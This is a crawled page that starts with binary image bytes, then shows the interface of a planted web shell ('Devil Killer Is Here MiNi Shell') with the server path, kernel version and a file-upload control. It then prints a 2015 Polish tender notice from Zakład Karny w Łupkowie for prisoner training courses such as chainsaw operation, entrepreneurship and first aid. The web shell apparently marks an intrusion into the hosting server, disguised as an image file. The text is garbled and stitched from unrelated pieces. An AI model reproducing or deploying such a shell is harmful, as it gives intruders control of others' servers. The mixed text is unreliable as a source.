JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150514/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150514/112744-N-2015.html

<p class="kh_header"><b>Komańcza: Usługi szkoleniowe dla osadzonych</b><br>
<b>Numer ogłoszenia: 112744 - 2015; data zamieszczenia: 14.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Łupkowie , Łupków 45, 38-543 Komańcza, woj. podkarpackie, tel. 013 467-70-49, faks 0-13 4677011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe dla osadzonych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia podzielony jest na 4 (cztery) zadania.Zadanie nr 1 - przedmiotem zadania nr 1 są usługi, polegające na zorganizowaniu i przeprowadzeniu 1 edycji kursu pod nazwą pilarz dla grupy 10 osadzonych odbywających karę 	pozbawienia wolności w Zakładzie Karnym w Łupkowie.
Zadanie nr 2 - przedmiotem zadania nr 2 są usługi, polegające na zorganizowaniu  i przeprowadzeniu 1 edycji kursu pod nazwą pilarz dla grupy 10 osadzonych odbywających karę pozbawienia wolności w Oddziale Zewnętrznym w Moszczańcu Zakładu Karnego w Łupkowie.Zadanie nr 3 - przedmiotem zadania nr 3 są usługi, polegające na przeprowadzeniu 1 edycji cyklu szkoleniowego w zakresie szkoleń kompetencyjnych dla grupy 10 osadzonych odbywających karę pozbawienia wolności w Zakładzie Karnym w Łupkowie. Uczestnicy cyklu  odbędą kurs z zakresu aktywizacji zawodowej, kurs ekologiczny, kurs obsługi komputera   przygotowujący do prowadzenia działalności gospodarczej, kurs ABC małej przedsiębiorczości 	oraz kurs z zakresu pierwszej pomocy.Zadanie nr 4 - przedmiotem zadania nr 4 są usługi, polegające na przeprowadzeniu 1 edycji       cyklu szkoleniowego w zakresie szkoleń kompetencyjnych dla grupy 10 osadzonych odbywających karę pozbawienia wolności w Oddziale Zewnętrznym w Moszczańcu Zakładu Karnego w Łupkowie.  Uczestnicy cyklu odbędą kurs z zakresu aktywizacji zawodowej, kurs ekologiczny, kurs obsługi komputera przygotowujący do prowadzenia działalności gospodarczej, kurs ABC małej przedsiębiorczości oraz kurs z zakresu pierwszej pomocy.Szkolenia kursowe oraz szkolenia kompetencyjne zostaną zorganizowane w ramach wdrażania            i realizacji Programu PL-17 pn. Wsparcie Służby Więziennej, w tym sankcji pozawięziennych  finansowanego ze środków Norweskiego Mechanizmu Finansowego dotyczącego Projektu Nr 1 pn. Realizacja szkoleń podnoszących kompetencje społeczno - zawodowe więźniów oraz stworzenie warunków ułatwiających podtrzymanie więzi rodzinnych w celu zwiększenia                     efektywności ich powrotu do społeczeństwa po zakończeniu odbywaniu kary.
2.Warunki szczegółowe:Zadanie nr 1 Część nr 1: Kurs Pilarz 
a)cel kursu: nabycie teoretycznych i praktycznych umiejętności do samodzielnej pracy w zawodzie zgodnym z tematyką kursu,b)czas trwania kursu: 150 godzin dydaktycznych/osobę (1 godz. = 45 minut) w tym:- zajęcia teoretyczne: 80 godzin/osobę- praktyczna nauka zawodu: 70 godzin/osobę c)zagadnienia:  
- przepisy bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej na stanowisku operatora pilarki,- budowa silników spalinowych dwusuwowych i ich działanie,- budowa pilarek wg układów,- charakterystyka pilarek używanych w leśnictwie,- paliwa, oleje i smary,- przygotowanie pilarki do pracy i utrzymanie właściwego stanu technicznego,- narzędzia i sprzęt pomocniczy do pozyskiwania drewna,- technika ścinki i obalania drzew w warunkach normalnych,
- ścinka drzew trudnych oraz usuwanie złomów i wywrotów,- technika przerzynki kłód i dłużnic,- technika okresywania drzew ściętych,- zasady organizacji procesu technologicznego pozyskania drewna w aspekcie wydajności  i ochrony pracy,
- wykorzystywanie surowca drzewnego - manipulacja i sortymentacja,
- wykaszarki i wycinarki (kosy mechaniczne) - budowa i zastosowanie w leśnictwie.
d) miejsce przeprowadzenia zajęć:  - teren Zakładu Karnego w Łupkowie, Łupków 45, 38-543 Komańcza.Zamawiający zobowiązuje się zapewnić sale dydaktyczne z wyposażeniem do zajęć teoretycznych oraz wskazać miejsca, w których odbywać się będą zajęcia praktyczne, e)maksymalny dzienny wymiar kursu: 8 godzin dydaktycznych. Kurs będzie realizowany sukcesywnie w dni powszednie od poniedziałku do soboty (z wyłączeniem dni ustawowo wolnych od pracy) w godz. 8:00 - 17:00. Zamawiający zastrzega, że  w soboty mogą odbywać się tylko zajęcia teoretyczne,f)kurs kończy się egzaminem końcowym z zagadnień teoretycznych oraz praktycznych przewidzianych w programie kursu. Egzamin sprawdzający przeprowadzi komisja powołana przez wykonawcę. Czas trwania egzaminu nie wlicza się do czasu trwania kursu. g)wykonawca poniesie wszystkie koszty związane z realizacją przedmiotu zamówienia w tym przede wszystkim koszty:- ubezpieczenia od następstw nieszczęśliwych wypadków osób uczestniczących w kursie,- materiałów edukacyjnych na potrzeby zajęć teoretycznych, w tym materiałów piśmienniczych niezbędnych do prowadzenia notatek, przyborów do pisania, skryptów lub podręczników 	zgodnych z tematyką kursu oraz materiałów do praktycznej nauki zawodu,- kompletnej odzieży roboczej wraz z obuwiem roboczym,  środków ochrony osobistej stosownej do pory roku i wykonywanych prac zgodnie z obowiązującymi przepisami BHP w ramach zajęć praktycznych dla każdego uczestnika kursu,-  narzędzi i sprzętu koniecznych do przeprowadzenia zajęć praktycznych,-wymaganych badań lekarskich osób uczestniczących w kursie, w tym badań wysokościowych, przeprowadzonych w celu uzyskania stosownego zaświadczenia lekarskiego stwierdzającego brak przeciwwskazań zdrowotnych do podjęcia nauki,- zaliczenia określonego programem kursu.Zadanie nr 2 Część nr 1: Kurs Pilarz a)cel kursu: nabycie teoretycznych i praktycznych umiejętności do samodzielnej pracy w zawodzie zgodnym z tematyką kursu,b)czas trwania kursu: 150 godzin dydaktycznych/osobę (1 godz. = 45 minut) w tym:- zajęcia teoretyczne: 80 godzin/osobę - praktyczna nauka zawodu: 70 godzin/osobę c)zagadnienia:  
- przepisy bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej na stanowisku operatora pilarski,- budowa silników spalinowych dwusuwowych i ich działanie,- budowa pilarek wg układów,- charakterystyka pilarek używanych w leśnictwie,- paliwa, oleje i smary,- przygotowanie pilarki do pracy i utrzymanie właściwego stanu technicznego,- narzędzia i sprzęt pomocniczy do pozyskiwania drewna,- technika ścinki i obalania drzew w warunkach normalnych,
- ścinka drzew trudnych oraz usuwanie złomów i wywrotów,- technika przerzynki kłód i dłużnic,- technika okresywania drzew ściętych,- zasady organizacji procesu technologicznego pozyskania drewna w aspekcie wydajności  i ochrony pracy,
- wykorzystywanie surowca drzewnego - manipulacja i sortymentacja,
- wykaszarki i wycinarki (kosy mechaniczne) - budowa i zastosowanie w leśnictwie.
d) miejsce przeprowadzenia zajęć:  - teren Oddziału Zewnętrznego w Moszczańcu, Moszczaniec 14, 38-543 Komańcza. Zamawiający zobowiązuje się zapewnić sale dydaktyczne z wyposażeniem do zajęć teoretycznych oraz wskazać miejsca, w których odbywać się będą zajęcia praktyczne,e) 	maksymalny dzienny wymiar kursu: 8 godzin dydaktycznych. Kurs będzie realizowany sukcesywnie w dni powszednie od poniedziałku do soboty (z wyłączeniem dni ustawowo wolnych 	od pracy) w godz. 8:00 - 17:00. Zamawiający zastrzega, że  w soboty mogą odbywać się tylko 	zajęcia teoretyczne,f)kurs kończy się egzaminem końcowym z zagadnień teoretycznych oraz praktycznych przewidzianych w programie kursu. Egzamin sprawdzający przeprowadzi komisja powołana przez wykonawcę. Czas trwania egzaminu nie wlicza się do czasu trwania kursu. g) wykonawca poniesie wszystkie koszty związane z realizacją przedmiotu zamówienia w tym przede wszystkim koszty:- ubezpieczenia od następstw nieszczęśliwych wypadków osób uczestniczących w kursie,- materiałów edukacyjnych na potrzeby zajęć teoretycznych, w tym materiałów piśmienniczych niezbędnych do prowadzenia notatek, przyborów do pisania, skryptów lub podręczników 	zgodnych z tematyką kursu oraz materiałów do praktycznej nauki zawodu,- kompletnej odzieży roboczej wraz z obuwiem roboczym, środków ochrony osobistej stosownej do pory roku i wykonywanych prac zgodnie z obowiązującymi przepisami BHP w ramach zajęć praktycznych dla każdego uczestnika -  narzędzi i sprzętu koniecznych do przeprowadzenia zajęć praktycznych,-wymaganych badań lekarskich osób uczestniczących w kursie, w tym badań wysokościowych, 	przeprowadzonych w celu uzyskania stosownego zaświadczenia lekarskiego stwierdzającego brak przeciwwskazań zdrowotnych do podjęcia nauki,- zaliczenia określonego programem kursu.Zadanie nr 3Część nr 1: Kurs z zakresu aktywizacji zawodowej
a) cel kursu: poznanie podstawowych zagadnień związanych z aktywnym poszukiwaniem zatrudnia na współczesnym rynku pracy,b)	czas trwania kursu: 20 godzin dydaktycznych/osobę (1 godz. = 45 minut),c) zagadnienia określone przez Ministerstwo Pracy i Polityki Społecznej wynikające z programu szkolenia w Klubie Pracy między innymi:- metody i techniki poszukiwania pracy,- analiza umiejętności i predyspozycji zawodowych,- poznanie podstawowych zasad przygotowania dokumentów aplikacyjnych,- przygotowanie do rozmowy kwalifikacyjnej z potencjalnym pracodawcom,- autoprezentacja,d) miejsce przeprowadzenia zajęć:- teren Zakładu Karnego w Łupkowie, Łupków 45, 38-543 Komańcza.e) maksymalny dzienny wymiar kursu: 8 godzin dydaktycznych. Kurs będzie realizowany 	sukcesywnie w dni powszednie od poniedziałku do soboty (z wyłączeniem dni ustawowo wolnych 	od pracy) w godz. 8:00 - 17:00.
f) wykonawca poniesie wszystkie koszty związane z realizacją przedmiotu zamówienia w tym przede wszystkim koszty:- ubezpieczenia od następstw nieszczęśliwych wypadków osób uczestniczących w kursie,-materiałów edukacyjnych na potrzeby zajęć teoretycznych, w tym materiałów piśmienniczych niezbędnych do prowadzenia notatek, przyborów do pisania, skryptów lub podręczników zgodnych z tematyką kursu.Część nr 2: Kurs ekologiczny
a) cel kursu: poznanie podstawowych zagadnień z zakresu ekologii o ochrony środowiskab) czas trwania kursu: 10 godzin dydaktycznych/osobę (1 godz.= 45 minut)c) zagadnienia:- ochrona lasów i terenów zielonych,- segregacja odpadów komunalnych,d)miejsce przeprowadzenia zajęć: - teren Zakładu Karnego w Łupkowie, Łupków 45, 38-543 Komańcza.e) maksymalny dzienny wymiar kursu: 8 godzin dydaktycznych. Kurs będzie realizowany sukcesywnie w dni powszednie od poniedziałku do soboty (z wyłączeniem dni ustawowo wolnych od pracy) w godz. 8:00 - 17:00. f) wykonawca poniesie wszystkie koszty związane z realizacją przedmiotu zamówienia w tym przede wszystkim koszty:- ubezpieczenia od następstw nieszczęśliwych wypadków osób uczestniczących w kursie 
 ekologicznym, - materiałów edukacyjnych na potrzeby zajęć teoretycznych, w tym materiałów piśmienniczych niezbędnych do prowadzenia notatek, przyborów do pisania, skryptów lub podręczników 	zgodnych z tematyką kursu.Część nr 3: Kurs obsługi komputera przygotowujący do prowadzenia działalności gospodarczej
a)cel kursu: poznanie podstaw wiedzy teoretycznej oraz praktycznej z zakresu komputerowej ob	sługi programu do projektowania ogrodów.b)czas trwania kursu: 60 godzin dydaktycznych/osobę (1 godz.= 45 minut)
c)zagadnienia:- zapoznanie z podstawami obsługi komputera,- nabycie praktycznych umiejętności obsługi urządzeń biurowych,- tworzenie środowiska pracy i omówienie podstawowych zestawów narzędzi,- zapoznanie z zagadnieniami księgowości, płac i kadr,- przetwarzanie tekstów, operacje fakturowania komputerowego,- nabycie podstawowych umiejętności obsługi programu komputerowego Asystent Faktura przeznaczonego  do wystawiania faktur. d) miejsce przeprowadzenia zajęć: -  teren Zakładu Karnego w Łupkowie, Łupków 45, 38-543 Komańcza.e) maksymalny dzienny wymiar kursu: 8 godzin dydaktycznych. Kurs będzie realizowany sukcesywnie w dni powszednie od poniedziałku do soboty (z wyłączeniem dni ustawowo wolnych od pracy) w godz. 8:00 - 17:00.f) wykonawca zabezpieczy na czas prowadzenia kursu sprzęt komputerowy wraz z programem Asystent Faktura,przeznaczonym do wystawiania faktur. g) wykonawca poniesie wszystkie koszty związane z realizacją przedmiotu zamówienia w tym 	przede wszystkim koszty:- ubezpieczenia od następstw nieszczęśliwych wypadków osób uczestniczących w kursie obsługi komputera z elementami obsługi programu do prowadzenia działalności gospodarczej.
- materiałów edukacyjnych na potrzeby zajęć teoretycznych, w tym materiałów piśmienniczych niezbędnych do prowadzenia notatek, przyborów do pisania, skryptów lub podręczników zgodnych z tematyką kursu.Część nr 4: Kurs ABC małej przedsiębiorczości a)cel kursu: poznanie podstawowych zagadnień związanych z założeniem i prowadzeniem własnej działalności gospodarczej.
b)czas trwania kursu: 40 godzin dydaktycznych/osobę (1 godz. = 45 minut)
c)zagadnienia określone przez Ministerstwo Pracy i Polityki Społecznej wynikające z programu szkolenia w Klubie Pracy między innymi:- ABC przedsiębiorczości - czyli jak założyć małą firmę,- jak przygotować biznes plan,- źródła finansowania działalności gospodarczej,- rozpoczynanie działalności gospodarczej,- marketing i reklama małej firmy,- praktyczne aspekty z zakresu księgowości i prawa podatkowego,- podstawowe zagadnienia z zakresu zarządzania działalnością gospodarczą,d) miejsce przeprowadzenia zajęć: - teren Zakładu Karnego w Łupkowie, Łupków 45, 38-543 Komańcza.e) maksymalny dzienny wymiar kursu: 8 godzin dydaktycznych. Kurs będzie realizowany sukcesywnie w dni powszednie od poniedziałku do soboty (z wyłączeniem dni ustawowo wolnych od pracy) w godz. 8:00 - 17:00.f) wykonawca poniesie wszystkie koszty związane z realizacją przedmiotu zamówienia w tym przede wszystkim koszty:- ubezpieczenia od następstw nieszczęśliwych wypadków osób uczestniczących w kursie,
- materiałów edukacyjnych na potrzeby zajęć teoretycznych, w tym materiałów piśmienniczych niezbędnych do prowadzenia notatek, przyborów do pisania, skryptów lub podręczników zgodnych z tematyką kursu.Część nr 5: Kurs pierwszej pomocy a)cel kursu: poznanie podstawowych technik udzielenia pierwszej pomocy oraz nabycia praktycznych umiejętności niezbędnych do udzielenia pierwszej pomocy. b) czas trwania kursu: 20 godzin dydaktycznych/osobę (1 godz. = 45 minut)- zajęcia teoretyczne: 10 godzin,- zajęcia praktyczne: 10 godzin. c)zagadnienia:- aspekty moralne i prawne udzielania pierwszej pomocy, - ocena stanu poszkodowanego,- postępowanie z poszkodowanym nieprzytomnym, - postępowanie w przypadku braku oddechu i krążenia, - postępowanie w przypadku urazów, - postępowanie w przypadku nagłych stanów, - ewakuacja poszkodowanego.d) miejsce przeprowadzenia zajęć:-  teren Zakładu Karnego w Łupkowie, Łupków 45, 38-543 Komańcza.e) maksymalny dzienny wymiar kursu: 8 godzin dydaktycznych. Kurs będzie realizowany sukcesywnie w dni powszednie od poniedziałku do soboty (z wyłączeniem dni ustawowo wolnych od pracy) w godz. 8:00 - 17:00.f) wykonawca zapewni na czas prowadzenia kursu niezbędny sprzęt do realizacji zajęćpraktycznych,g) wykonawca poniesie wszystkie koszty związane z realizacją przedmiotu zamówienia w tym przede wszystkim koszty:
- ubezpieczenia od następstw nieszczęśliwych wypadków osób uczestniczących w kursie,- materiałów edukacyjnych na potrzeby zajęć teoretycznych, w tym materiałów piśmienniczych	niezbędnych do prowadzenia notatek, przyborów do pisania, skryptów lub podręczników zgodnych z tematyką kursu.Zadanie nr 4
Część nr 1: Kurs z zakresu aktywizacji zawodowej a)cel kursu: poznanie podstawowych zagadnień związanych z aktywnym poszukiwaniem zatrudnienia na współczesnym rynku pracy,b)	czas trwania kursu: 20 godzin dydaktycznych/osobę (1 godz. = 45 minut),c)zagadnienia określone przez Ministerstwo Pracy i Polityki Społecznej wynikające z programu szkolenia w Klubie Pracy między innymi:
- metody i techniki poszukiwania pracy,- analiza umiejętności i predyspozycji zawodowych,- poznanie podstawowych zasad przygotowania dokumentów aplikacyjnych,- przygotowanie do rozmowy kwalifikacyjnej z potencjalnym pracodawcom,- autoprezentacja,d) miejsce przeprowadzenia zajęć:
- teren Oddziału Zewnętrznego w Moszczańcu, Moszczaniec 14, 38-543 Komańcza.
e) maksymalny dzienny wymiar kursu: 8 godzin dydaktycznych. Kurs będzie realizowany sukcesywnie w dni powszednie od poniedziałku do soboty (z wyłączeniem dni ustawowo wolnych od pracy) w godz. 8:00 - 17:00.
f) wykonawca poniesie wszystkie koszty związane z realizacją przedmiotu zamówienia w tym przede wszystkim koszty:- ubezpieczenia od następstw nieszczęśliwych wypadków osób uczestniczących w kursie,-materiałów edukacyjnych na potrzeby zajęć teoretycznych, w tym materiałów piśmienniczych niezbędnych do prowadzenia notatek, przyborów do pisania, skryptów lub podręczników zgodnych z tematyką kursu.Część nr 2: Kurs ekologiczny
a)cel kursu: poznanie podstawowych zagadnień z zakresu ekologii o ochrony środowiska b)czas trwania kursu: 10 godzin dydaktycznych/osobę (1 godz.= 45 minut) c)	zagadnienia:- ochrona lasów i terenów zielonych,
- segregacja odpadów komunalnych, d) miejsce przeprowadzenia zajęć: 
- teren Oddziału Zewnętrznego w Moszczańcu, Moszczaniec 14, 38-543 Komańcza.
e) maksymalny dzienny wymiar kursu: 8 godzin dydaktycznych. Kurs będzie
 realizowany sukcesywnie w dni powszednie od poniedziałku do soboty (z wyłączeniem dni ustawowo wolnych od pracy) w godz. 8:00 - 17:00.             
f) wykonawca poniesie wszystkie koszty związane z realizacją przedmiotu zamówienia w tym 	przede wszystkim koszty:- ubezpieczenia od następstw nieszczęśliwych wypadków osób uczestniczących w kursie ekologicznym, 
- materiałów edukacyjnych na potrzeby zajęć teoretycznych, w tym materiałów piśmienniczych niezbędnych do prowadzenia notatek, przyborów do pisania, skryptów lub podręczników 	zgodnych z tematyką kursu.Część nr 3: Kurs obsługi komputera przygotowujący do prowadzenia działalności                               gospodarczej a)cel kursu: poznanie podstaw wiedzy teoretycznej oraz praktycznej z zakresu komputerowej ob	sługi programu do projektowania ogrodów.
b)czas trwania kursu: 60 godzin dydaktycznych/osobę (1 godz.= 45 minut)
c)zagadnienia:- zapoznanie z podstawami obsługi komputera,- nabycie praktycznych umiejętności obsługi urządzeń biurowych,- tworzenie środowiska pracy i omówienie podstawowych zestawów narzędzi,- zapoznanie z zagadnieniami księgowości, płac i kadr,- przetwarzanie tekstów, operacje fakturowania komputerowego,- nabycie podstawowych umiejętności obsługi programu komputerowego Asystent Faktura przeznaczonego  do wystawiania faktur. d) miejsce przeprowadzenia zajęć: - teren Oddziału Zewnętrznego w Moszczańcu, Moszczaniec 14, 38-543 Komańcza.e) maksymalny dzienny wymiar kursu: 8 godzin dydaktycznych. Kurs będzierealizowany sukcesywnie w dni powszednie od poniedziałku do soboty (z wyłączeniem dni ustawowo wolnych od pracy) w godz. 8:00 - 17:00.f) wykonawca zabezpieczy na czas prowadzenia kursu sprzęt komputerowy wraz z programem Asystent Faktura, przeznaczonym do wystawiania faktur.g) wykonawca poniesie wszystkie koszty związane z realizacją przedmiotu zamówienia w tym przede wszystkim koszty:
- ubezpieczenia od następstw nieszczęśliwych wypadków osób uczestniczących w kursie obsługi komputera z elementami obsługi programu do prowadzenia działalności gospodarczej.- materiałów edukacyjnych na potrzeby zajęć teoretycznych, w tym materiałów piśmienniczych niezbędnych do prowadzenia notatek, przyborów do pisania, skryptów lub podręczników zgodnych z tematyką kursu.Część nr 4: Kurs ABC małej przedsiębiorczości a) cel kursu: poznanie podstawowych zagadnień związanych z założeniem  i prowadzeniem własnej działalności gospodarczej.b) 	czas trwania kursu: 40 godzin dydaktycznych/osobę (1 godz. = 45 minut)c)zagadnienia określone przez Ministerstwo Pracy i Polityki Społecznej wynikające z programu szkolenia w Klubie Pracy między innymi:
- ABC przedsiębiorczości - czyli jak założyć małą firmę,- jak przygotować biznes plan,- źródła finansowania działalności gospodarczej,- rozpoczynanie działalności gospodarczej,- marketing i reklama małej firmy,- praktyczne aspekty z zakresu księgowości i prawa podatkowego,- podstawowe zagadnienia z zakresu zarządzania działalnością gospodarczą,d) miejsce przeprowadzenia zajęć: 
- teren Oddziału Zewnętrznego w Moszczańcu, Moszczaniec 14, 38-543 Komańcza.
e) maksymalny dzienny wymiar kursu: 8 godzin dydaktycznych. Kurs będzie realizowany sukcesywnie w dni powszednie od poniedziałku do soboty (z wyłączeniem dni ustawowo wolnych 	od pracy) w godz. 8:00 - 17:00.
f) wykonawca poniesie wszystkie koszty związane z realizacją przedmiotu zamówienia w tym przede wszystkim koszty:- ubezpieczenia od następstw nieszczęśliwych wypadków osób uczestniczących w kursie,- materiałów edukacyjnych na potrzeby zajęć teoretycznych, w tym materiałów piśmienniczych niezbędnych do prowadzenia notatek, przyborów do pisania, skryptów lub podręczników zgodnych z tematyką kursu.Część nr 5: Kurs pierwszej pomocy
a)cel kursu: poznanie podstawowych technik udzielenia pierwszej pomocy oraz nabycia 	praktycznych umiejętności niezbędnych do udzielenia pierwszej pomocy. b)czas trwania kursu: 20 godzin dydaktycznych/osobę (1 godz. = 45 minut)- zajęcia teoretyczne: 10 godzin,- zajęcia praktyczne: 10 godzin.
c)zagadnienia:- aspekty moralne i prawne udzielania pierwszej pomocy, 
- ocena stanu poszkodowanego,- postępowanie z poszkodowanym nieprzytomnym, - postępowanie w przypadku braku oddechu i krążenia, 
- postępowanie w przypadku urazów, - postępowanie w przypadku nagłych stanów, - ewakuacja poszkodowanego.d) miejsce przeprowadzenia zajęć:
-  teren Oddziału Zewnętrznego w Moszczańcu, Moszczaniec 14, 38-543 Komańcza.e) maksymalny dzienny wymiar kursu: 8 godzin dydaktycznych. Kurs będzie realizowany 	sukcesywnie w dni powszednie od poniedziałku do soboty (z wyłączeniem dni ustawowo wolnych od pracy) w godz. 8:00 - 17:00.
f) wykonawca zapewni na czas prowadzenia kursu niezbędny sprzęt do realizacji zajęć praktycznych,g) wykonawca poniesie wszystkie koszty związane z realizacją przedmiotu zamówienia w tym przede wszystkim koszty:- ubezpieczenia od następstw nieszczęśliwych wypadków osób uczestniczących w kursie,- materiałów edukacyjnych na potrzeby zajęć teoretycznych, w tym materiałów piśmienniczych niezbędnych do prowadzenia notatek, przyborów do pisania, skryptów        
lub podręczników zgodnych z tematyką kursu.3.Wykonawca zobowiązany jest do przedstawienia do akceptacji szczegółowego harmonogramu realizacji zajęć, programu kursu oraz wzoru zaświadczenia potwierdzającego ukończenie kursu zgodnie z obowiązującymi przepisami m. in. Rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2014 r., poz. 622) oraz Rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych (Dz. U. Nr 37, 	poz. 337 ze zm.) wraz ze wskazaniem planowanego terminu rozpoczęcia i zakończenia kursu wraz, najpóźniej w dniu podpisania umowy. Harmonogram, program zajęć oraz wzór zaświadczeń wymagają zatwierdzenia.4.Program kursu powinien zawierać w szczególności:a) nazwę i zakres kursu,b) czas trwania i sposób organizacji kursu,
